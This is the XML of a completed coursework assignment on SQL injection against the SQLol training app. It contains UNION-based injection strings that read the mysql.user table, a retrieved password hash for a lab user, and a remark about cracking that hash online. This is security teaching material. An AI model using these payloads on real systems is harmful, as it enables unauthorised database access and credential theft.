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236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="280" w:after="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS 214 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Assignment  SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assignment assumes you have already set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as described in SQLInjectionDemo.pdf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recall that the first significant step in the attack by Anonymous on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HBGary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Federal was to use SQL Injection to dump administrator usernames and passwords from the DBMS. That's exactly what you will do in this assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First however, you will have to add an administrator. This is done by interacting directly with the DBMS (not through the web server) as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrator of the DBMS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At a root command prompt in Kali (with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service started) type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>This will change your prompt to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>This is the command line interface to the DBMS. As an administrator, you can add a new user to the database using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; CREATE USER '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aaron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'@'localhost' IDENTIFIED BY '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dumbpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The result of this is that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be able to login locally to the database using the password “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dumbpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Exit the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For the rest of this assignment, you will interact with the database through the web browser as an attacker would. Your task is to use SQL injection to retrieve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaron's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hashed password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Like all other metadata, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaron's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hashed password is stored in one of the tables in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Use commands like the ones in the demo to poke around in those tables to find out where it is stored and retrieve it when you find it. The table names are fairly descriptive so it's not hard to find them!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What to Turn in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When you are done, answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>1. What is the name of the table where the password hashes are found?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>Answer here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF701A" w:rsidRDefault="00CF701A" w:rsidP="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="100" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The table with the hashed passwords is called “Password”, and is within the table “u</w:t>
      </w:r>
      <w:r w:rsidR="00C97EB9">
        <w:t>ser” within the schema “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C97EB9">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C97EB9">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>2. What are the names of all columns in the table where the password hashes are found?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>Answer here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2C61" w:rsidRDefault="004D2C61">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59AB85D7" wp14:editId="243A6EDC">
            <wp:extent cx="5943600" cy="910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10590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2C61" w:rsidRDefault="004D2C61">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Host, User, and Password are the columns that we care about.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaron's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hashed password?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>Answer here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007956F3" w:rsidRDefault="007956F3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="007956F3">
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007956F3">
        <w:t>B96E9E701CCF8A5B7E99FDE5D78D9CB110E13A49 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>4. What command, typed into the form on the web page, retrieves the names of the columns in question 2?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>Answer here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007956F3" w:rsidRDefault="007956F3" w:rsidP="007956F3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t xml:space="preserve"> SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF701A">
        <w:t>='user' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Show a screenshot of the result of that command (i.e., the portion of the web page starting at “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>results:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007956F3" w:rsidRDefault="007956F3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683E99C8" wp14:editId="11C835EF">
            <wp:extent cx="5943600" cy="1936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6750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. What command, typed into the form on the web page, retrieves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaron's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hashed password?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>Answer here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97EB9" w:rsidRDefault="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t>' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t xml:space="preserve"> SELECT password FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t>mysql.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t xml:space="preserve"> WHERE user='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t>aaron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97EB9">
        <w:t>' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Show a screenshot of the result of that command (i.e., the portion of the web page starting at “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>results:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00CF701A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97EB9" w:rsidRDefault="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EA68F3" wp14:editId="072624ED">
            <wp:extent cx="5943600" cy="1296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96035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97EB9" w:rsidRDefault="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C97EB9" w:rsidRDefault="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Just for fun:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97EB9" w:rsidRDefault="00C97EB9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I put Aaron’s hashed </w:t>
      </w:r>
      <w:r w:rsidR="00275EDD">
        <w:t xml:space="preserve">password into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00275EDD">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00275EDD">
        <w:t xml:space="preserve"> and was able to decrypt it very easily:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00275EDD" w:rsidRPr="00C97EB9" w:rsidRDefault="00275EDD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BF7216" wp14:editId="1C148A2C">
            <wp:extent cx="5943600" cy="1946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46910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D72236" w:rsidRDefault="00D72236"/>
    <w:sectPr w:rsidR="00D7223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236"/>
    <w:rsid w:val="00275EDD"/>
    <w:rsid w:val="004D2C61"/>
    <w:rsid w:val="007956F3"/>
    <w:rsid w:val="00C97EB9"/>
    <w:rsid w:val="00CF701A"/>
    <w:rsid w:val="00D7223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BB05"/>
  <w15:docId w15:val="{4D755DAE-8718-415B-B973-DE4546CA1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C50E9F"/>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dc:description/>
  <cp:lastModifiedBy>DALBRECHT</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-04T21:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-06T20:21:00Z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